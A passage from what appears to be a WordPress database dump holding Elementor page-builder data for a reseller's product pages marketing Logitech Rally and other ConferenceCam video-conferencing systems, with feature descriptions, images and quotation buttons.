\\u0097automatically!<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7601a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d30db6c\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"612d913\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12cc4b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4df284a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-2.jpg\",\"id\":2913}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b51f998\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7afaa26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMART CABLING AND CONTENT SHARING<\\/h3><p>With a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b6a06a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f826d19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-3.jpg\",\"id\":2914}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2473dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"470dd3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b2bfdfa\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a54b538\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a87eb99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1331\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SEE EVERYONE, PERFECTLY FRAMED<\\/h4><p>Logitech RightSight\\u0099 camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9238ce1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e400259\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c3cf6bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"628d3e1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a14cdde\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af2bc65\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"92dbf40\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3b7da92\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917f02\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8f441a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c1a745e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af53cbc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"18b598e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7e4f1f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e7ae67\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5349,2906,'_elementor_version','0.4'),(5351,2916,'_elementor_edit_mode','builder'),(5352,2916,'_elementor_template_type','post'),(5353,2916,'_wp_page_template','template-fullwidth.php'),(5354,2916,'_elementor_data','[{\"id\":\"008e84f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"21f0da0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"34477cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>RALLY<\\/h3><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Modular audio for full coverage of medium to very large rooms<\\/li><li>Premium components and sleek industrial design<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5bb4207\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b5262b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9021bd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d99b4d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21995c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL TOGETHER NOW<\\/h3><p>Logitech Rally delivers studio-quality video, unmatched voice clarity, and RightSense\\u2122 automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft Skype\\u00ae for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a0aee94\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"218bc5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"434bad8\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0624977\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cb4a385\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d24280\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/uwx62jjxOnE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"742163f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b70394f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd1e4d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"92a5761\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"c4d9848\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADVANCED MODULAR AUDIO<\\/h3><p>Crystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound that\\u0092s natural, crisp, and highly intelligible. Logitech RightSound\\u0099\\u2122 enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a921491\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"3fa5585\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp.jpg\",\"id\":2911}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58834df\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5c2d6f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"456e282\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-1.jpg\",\"id\":2912}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"fc84764\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b27f55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Every component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f623216\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3614128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61805be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of technologies built into Rally that automate a better user experience. RightSight\\u2122 perfectly auto-frames participants no matter their distance from the lens. RightLight\\u2122 prioritizes faces over environment to render natural-looking skin tones while RightSound\\u0099\\u2122 enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings \\u2014 \\u0097automatically!<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7601a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d30db6c\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"612d913\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12cc4b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4df284a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-2.jpg\",\"id\":2913}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b51f998\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7afaa26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMART CABLING AND CONTENT SHARING<\\/h3><p>With a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b6a06a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f826d19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-3.jpg\",\"id\":2914}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2473dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"470dd3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b2bfdfa\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a54b538\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a87eb99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1331\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SEE EVERYONE, PERFECTLY FRAMED<\\/h4><p>Logitech RightSight\\u0099 camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9238ce1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e400259\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>LET THE SUNSHINE IN<\\/h4><p>Even in meeting rooms with bright windows, Logitech RightLight\\u0099 technology with Wide Dynamic Range (WDR) prioritizes faces and human figures over objects and surfaces. The result is a balanced image that renders participants in flattering light with reduced glare and softer shadows, even in dim or backlit conditions<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c3cf6bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"628d3e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ADAPTIVE PAN, TILT AND ZOOM<\\/h4><p>Pan and tilt speeds automatically adapt to the level of zoom. The result: faster camera movement when zoomed out for quick framing and slower camera movement when zoomed in for more control.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a14cdde\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af2bc65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FRONT OF ROOM AUDIO<\\/h4><p>Unlike tabletop speakerphones that decouple voices from video, Rally speakers are designed for placement at the front of the room. By aligning speakers with the display, a person\'\\u0092s voice and video both come from the same place \\u0097 and never from behind you \\u2014 \\u0097 so conversations feel more natural and lifelike.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"92dbf40\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3b7da92\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917f02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>OPTIONAL MOUNTING KIT<\\/h4><p>Add Rally Mounting Kit for a streamlined installation of each component. Strong wall mounts allow ideal placement for the camera and two speakers, while ventilated mounting plates attach the display and table hubs on a wall or beneath a table. Two cleverly-designed retainers keep cables secure.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8f441a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c1a745e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>LOUD AND CLEAR<\\/h4><p>The Rally display hub powers up to two speakers, providing rich sound even in larger rooms. A patent-pending suspension system virtually eliminates vibrations that travel through walls, stands, and tables. This improves echo cancellation while keeping video shake-free, even at high volume levels and when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af53cbc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"18b598e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>UP TO 7 MIC PODS<\\/h4><p>For rooms with more than 10 participants, add Rally Mic Pods to expand audio coverage and provide convenient access to mute controls. Each pod adds coverage for six more participants, so you can deploy Rally in large meeting spaces and boardrooms with up to 46 people.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7e4f1f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e7ae67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FLEXIBLE MIC POD CABLING<\\/h4><p>A more flexible alternative to daisy-chain connections, Rally Mic Pod Hub makes it easy to run cables beneath the table with three connections for Rally Mic Pods or additional Mic Pod Hubs. With a single-cable connection, participants can reposition individual mic pods to make space on the table or to bring mute control within easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a45d7e6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"722f670\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"61e2996\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5355,2916,'_elementor_version','0.4'),(5358,16,'_elementor_edit_mode','builder'),(5359,16,'_elementor_template_type','post'),(5366,2917,'_wp_page_template','template-fullwidth.php'),(5367,2917,'_elementor_edit_mode','builder'),(5368,2917,'_elementor_template_type','post'),(5369,2917,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":-18},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":31},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference 